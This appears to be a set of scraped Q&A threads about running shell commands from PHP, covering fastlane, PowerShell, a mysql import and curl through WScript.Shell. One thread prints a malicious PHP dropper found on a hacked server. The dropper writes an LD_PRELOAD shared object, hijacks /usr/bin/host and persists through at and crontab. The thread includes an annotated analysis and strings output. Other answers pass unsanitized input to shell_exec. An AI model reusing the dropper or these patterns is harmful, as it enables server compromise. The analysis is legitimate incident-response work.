i was trying run fast lane commands in terminal using php, the commands like cd, pwd, ls and chmod working fine in php using exec or shell exec functions but when i try to run fast lane command it throws error 127, how can i run fast lane using php?
function terminal($command)
{
$output = [];
$return_var = '';
//exec
if (function_exists('exec')) {
exec($command, $output, $return_var);
} else {
$output = 'Command execution not possible on this system';
$return_var = 1;
}
return array('output' => $output, 'status' => $return_var);
}
// $path = "cd /Applications/XAMPP/xamppfiles/htdocs/mystudiomobile/cordova7/platforms/ios/fastlane";
// $path_c = "fastlane init"; path and path_c present in test.sh
$command = "/Applications/XAMPP/xamppfiles/htdocs/php1/test.sh";
$path_change = terminal("$command");
if($path_change['status'] == 0)
{
echo json_encode($path_change['output']);
echo $path_change['status'];
}
else
{
echo "some problem";
echo $path_change['status'];
}
I found out that there are limitations in php to perform http and https protocols using system functions like exec. which could not run fast lane, the best practise is to go with bash script which access php instead of vice versa .
I have a powershell script which outputs a video file duration. Running this script gives me the expected result.
$Folder = 'C:\my\path\to\folder'
$File = 'sample1_1280_720.mp4'
$LengthColumn = 27
$objShell = New-Object -ComObject Shell.Application
$objFolder = $objShell.Namespace($Folder)
$objFile = $objFolder.ParseName($File)
$Length = $objFolder.GetDetailsOf($objFile, $LengthColumn)
Write-Output $Length
In a php file, I'm trying to save this output to a variable.
<?php
$var = shell_exec("powershell -File C:\my\path\to\psFile.ps1 2>&1");
echo "<pre>$var</pre>";
?>
The string output I get from shell_exec is the text you see when you start powershell from cmd. Windows PowerShell
Copyright (C) 2016 Microsoft Corporation. All rights reserved. Any suggestions on how to extract the video duration?
Using your PS code
$Folder = 'C:\my\path\to\folder'
$File = 'sample1_1280_720.mp4'
$LengthColumn = 27
$objShell = New-Object -ComObject Shell.Application
$objFolder = $objShell.Namespace($Folder)
$objFile = $objFolder.ParseName($File)
$Length = $objFolder.GetDetailsOf($objFile, $LengthColumn)
$Length
I'm able to get the file length using PS -File and -Command. I added a few other flags you may want or need. You shouldn't need to use redirection 2>&1 to get your variable from PS to PHP. It is most likely the reason you are getting the logo.
function PowerShellCommand($Command)
{
$unsanitized = sprintf('powershell.exe -NonInteractive -NoProfile -ExecutionPolicy Bypass -Command "%s"', $Command);
return shell_exec($unsanitized);
}
function PowerShellFile($File)
{
$unsanitized = sprintf('powershell.exe -NonInteractive -NoProfile -ExecutionPolicy Bypass -File "%s"', $File);
return shell_exec($unsanitized);
}
// Can use relative paths
echo PowerShellCommand("./psFile.ps1");
// Be sure to escape Windows paths if needed
echo PowerShellFile("C:\\my\\path\\to\\folder\\psFile.ps1");
Returning $Length in all three ways work for me
$Length
return $Length
Write-Output $length
So I have been hacked a while ago and now I have a weird PHP file in my file manager. This is the content of it:
<?php
#touch("index.html");
header("Content-type: text/plain");
print "2842123700\n";
if (! function_exists('file_put_contents')) {
function file_put_contents($filename, $data) {
$f = #fopen($filename, 'w');
if (! $f)
return false;
$bytes = fwrite($f, $data);
fclose($f);
return $bytes;
}
}
#system("killall -9 ".basename("/usr/bin/host"));
$so32 = "\x7f\x45\x4c\x46\x01\x01\x01\x00\x00\x00\x ... ETC ...";
$so64 = "\x7f\x45\x4c\x46\x02\x01\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x3e\x00\x01\x00\x00\x00\x78\x13\x00\x00\x00\x00\x00\x00\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\ ...ETC...";
$arch = 64;
if (intval("9223372036854775807") == 2147483647)
$arch = 32;
$so = $arch == 32 ? $so32 : $so64;
$f = fopen("/usr/bin/host", "rb");
if ($f) {
$n = unpack("C*", fread($f, 8));
$so[7] = sprintf("%c", $n[8]);
fclose($f);
}
$n = file_put_contents("./jquery.so", $so);
$AU=#$_SERVER["SERVER_NAME"].$_SERVER["REQUEST_URI"];
$HBN=basename("/usr/bin/host");
$SCP=getcwd();
#file_put_contents("1.sh", "#!/bin/sh\ncd '".$SCP."'\nif [ -f './jquery.so' ];then killall -9 $HBN;export AU='".$AU."'\nexport LD_PRELOAD=./jquery.so\n/usr/bin/host\nunset LD_PRELOAD\ncrontab -l|grep -v '1\.sh'|grep -v crontab|crontab\nfi\nrm 1.sh\nexit 0\n");
#chmod("1.sh", 0777);
#system("at now -f 1.sh", $ret);
if ($ret == 0) {
for ($i = 0; $i < 5; $i++) {
if (! #file_exists("1.sh")) {
print "AT success\n";
exit(0);
}
sleep(1);
}
}
#system("(crontab -l|grep -v crontab;echo;echo '* * * * * ".$SCP."/1.sh')|crontab", $ret);
if ($ret == 0) {
for ($i = 0; $i < 62; $i++) {
if (! #file_exists("1.sh")) {
print "CRONTAB success\n";
exit(0);
}
sleep(1);
}
}
#system("./1.sh");
#unlink("1.sh");
?>
Ofcourse, I delete it. But what did it? Are there more files infected?
I understand that it is checking if the system is a 32bit system or 64bit, then it creates 1.sh and executes it but what then?
Full code: http://pastebin.com/hejkuQtV
I tried to analyze the code. Have a look at this and check my comments regarding the shell script "1.sh". In my opinion deleting the PHP script would not be sufficient.
<?php
//probably the attacker wants to check that the script works.
#touch("index.html");
header("Content-type: text/plain");
print "2842123700\n";
//redefine file_put_contents if doesn't exist
if (! function_exists('file_put_contents')) {
function file_put_contents($filename, $data) {
$f = #fopen($filename, 'w');
if (! $f)
return false;
$bytes = fwrite($f, $data);
fclose($f);
return $bytes;
}
}
//kill all running instances of host command. "host" command is used for DNS lookups among other things.
#system("killall -9 ".basename("/usr/bin/host"));
//32 bit
$so32 = "\x7f\x45\x4c\x46\x01\x01\x01\x00\x00\x00\x ... ETC ...";
//64 bit
$so64 = "\x7f\x45\x4c\x46\x02\x01\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x3e\x00\x01\x00\x00\x00\x78\x13\x00\x00\x00\x00\x00\x00\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\ ...ETC...";
$arch = 64;
//decide on the architecture based on the value of max int
if (intval("9223372036854775807") == 2147483647)
$arch = 32;
//the hex based on architecture. "so" probably contains a function() used by "host". The attacker is replacing it later before running "host" command.
$so = $arch == 32 ? $so32 : $so64;
//read 8 bytes from "host" binary file, and unpack it as an unsigned char.
$f = fopen("/usr/bin/host", "rb");
if ($f) {
//n is an array of unsigned chars. Each array item can be (0-255)
$n = unpack("C*", fread($f, 8));
//convert to ascii, and replace the 7th character in the string with a value obtained from "hosts" binary file.
//This vale from "hosts" will be specific to current server/environment - set during compilation/installation.
//NOTE: The contents of "so" string, will be written to a new file "jquery.so".
$so[7] = sprintf("%c", $n[8]);
fclose($f);
}
//the shared object
$n = file_put_contents("./jquery.so", $so);
//The shared object "jquery.so" uses an environment variable named "AU". It's more clear later.
$AU=#$_SERVER["SERVER_NAME"].$_SERVER["REQUEST_URI"];
//should give "host"
$HBN=basename("/usr/bin/host");
//current dir
$SCP=getcwd();
//Examining the following line, here's what it writes to 1.sh
#file_put_contents("1.sh", "#!/bin/sh\ncd '".$SCP."'\nif [ -f './jquery.so' ];then killall -9 $HBN;export AU='".$AU."'\nexport LD_PRELOAD=./jquery.so\n/usr/bin/host\nunset LD_PRELOAD\ncrontab -l|grep -v '1\.sh'|grep -v crontab|crontab\nfi\nrm 1.sh\nexit 0\n");
/*
* #!/bin/sh
* cd '/path/to/1.sh'
* if [ -f './jquery.so' ];then
* killall -9 host;
* export AU='MYSERVER.COM/THE/REQUEST/URI' //this will be referenced in "jquery.so"
* export LD_PRELOAD=./jquery.so //load the shared object before executing "host" command. THIS IS THE CORE OF THE ATTACK. Load the attacker's shared object(which contains his function, lets call it "xyz") before executing "host" command.
* /usr/bin/host //execute. At that point, if "host" is making use of function "xyz", it would have been replaced by malicious "xyz" from "jquery.so" And since you don't know what the attacker function is actually doing, you should assume YOUR SYSTEM IS COMPROMISED.
* unset LD_PRELOAD
* crontab -l|grep -v '1\.sh'|grep -v crontab|crontab //not sure about this.
* fi
* rm 1.sh //remove
* exit 0
*/
#chmod("1.sh", 0777);
#system("at now -f 1.sh", $ret); //execute 1.sh. It will be deleted once it's executed as per the "rm" statement.
if ($ret == 0) {
//try for 5 seconds until the file is deleted (hence executed). If so, then all good.
for ($i = 0; $i < 5; $i++) {
if (! #file_exists("1.sh")) {
print "AT success\n";
exit(0);
}
sleep(1);
}
}
//another attempt to execute the file in case the above failed.
#system("(crontab -l|grep -v crontab;echo;echo '* * * * * ".$SCP."/1.sh')|crontab", $ret);
if ($ret == 0) {
//keep trying for 60 seconds until the file is deleted (as per the crontab setup.)
for ($i = 0; $i < 62; $i++) {
if (! #file_exists("1.sh")) {
print "CRONTAB success\n";
exit(0);
}
sleep(1);
}
}
//the last resort if the previous execute attempts didn't work.
#system("./1.sh");
#unlink("1.sh");
?>
Here's a little more info. First, we can use this code to generate the ".so" file.
<?php
//build the attack string (this contains the hex representation of the attacker complied/linked program)
$so32="\x7f\x45\x4c\x46\x01\x01\x01\x00\x00\x00\x00\x00\x00.....";
//print it. This will output the binary
echo $so32;
?>
//run
php hack.php > jquery.so
At this point, we have the same shared object that the attacker loaded before running "host". Using "strings" command:
$ strings ./jquery.so
Output:
write
unlink
pthread_mutex_lock
pthread_mutex_unlock
gettimeofday
free
realloc
strdup
read
getaddrinfo
freeaddrinfo
socket
setsockopt
connect
malloc
mmap
munmap
usleep
strcmp
dlclose
pthread_join
__errno_location
strncmp
sprintf
strcpy
time
vsnprintf
strcat
strstr
atoi
strchr
dlopen
dlsym
pthread_create
srandom
lseek
ftruncate
umask
setsid
chroot
_exit
signal
fork
dladdr
realpath
getpid
execl
wait
getsockname
getenv
geteuid
unsetenv
popen
fgets
fclose
QQRW
1c2#N
v[uq
M!k(q.%
jc[Sj
F,%s,%x
R,%d,%d,%d,%s,%s,
P,%u,%u,%u,%u,%u
POST %s HTTP/1.0
Host: %s
Pragma: 1337
Content-Length: %d
core
%s/%s
|$$$}rstuvwxyz{$$$$$$$>?#ABCDEFGHIJKLMNOPQRSTUVW$$$$$$XYZ[\]^_`abcdefghijklmnopq
/dev/null
%s/%c.%d
(null)
ROOT
LD_PRELOAD
/usr/bin/uname -a
/tmp
As you can see, his hack seems to be using lots of functions including him doing a POST request somewhere. It's not possible of course to figure it out from the above but gives you some clue.
If you want to take this further, you can look into and ELF decompiler. But I doubt that you will be able to reach anything conclusive. I am not an expert, but my advise is to keep on monitoring your network activity for anything out of the ordinary.
The "file" command gives you a bit of information about the file - hence ELF decomplier.
$ file ./jquery..so
Output:
./jquery.so: ELF 32-bit LSB shared object, Intel 80386, version 1 (SYSV), dynamically linked, stripped
I need to run a SQL file (to create a user) from within my PHP. I know how this is done:
$commands = file_get_contents("sql/create_usr.sql")
$commands = explode(";", $commands);
foreach($commands as $command){
if($command){
$success += (#mysql_query($command)==false ? 0 : 1);
$total += 1;
}
}
How do I run the SQL file with specific parameters (e.g. username, password) from a PHP file.
Thanks in advance.
You might want to use a simple shell execution for this, instead of splitting the file with PHP:
shell_exec( 'mysql DATABASE -u USERNAME -pPASSWORD < sql/create_usr.sql' );
To test, if you can run a SQL-Query using shell_exec you might want to try this code:
echo shell_exec( 'mysql DATABASE -u USERAME -pPASSWORD -e "SELECT DATABASE();" 2>&1' );
Read your file line by line and the execute the sentense
$handle = fopen("inputfile.txt", "r");
if ($handle) {
while (($line = fgets($handle)) !== false) {
// process the line read.
}
} else {
// error opening the file.
}
fclose($handle);
I was trying to use wscript.shell through COM objects with php to pass some cmd commands to cURL library (the DOS version). here is what I use to perform this task:
function windExec($cmd,$mode=''){
// Setup the command to run from "run"
$cmdline = "cmd /C $cmd";
// set-up the output and mode
if ($mode=='FG'){
$outputfile = uniqid(time()) . ".txt";
$cmdline .= " > $outputfile";
$m = true;
}
else $m = false;
// Make a new instance of the COM object
$WshShell = new COM("WScript.Shell");
// Make the command window but dont show it.
$oExec = $WshShell->Run($cmdline, 0, $m);
if ($outputfile){
// Read the tmp file.
$retStr = file_get_contents($outputfile);
// Delete the temp_file.
unlink($outputfile);
}
else $retStr = "";
return $retStr;
}
now when I run this function like:
windExec("\"C:/Documents and Settings/ermac/Desktop/my project/curl\" http://www.google.com/", 'FG');
curl doesn't run because there is a problem with the path. but when I remove the spaces from the path it works great.
windExec("\"C:/curl\" http://www.google.com/", 'FG');
so my question is how can I escape these spaces in wscript.shell commands?
is there anyway I can fix this?
thanks in advance :)
nvm I found a solution:
there:
windExec("cd C:/Documents and Settings/ermac/Desktop/my project/libs & curl.exe -L http://www.google.com/", 'FG');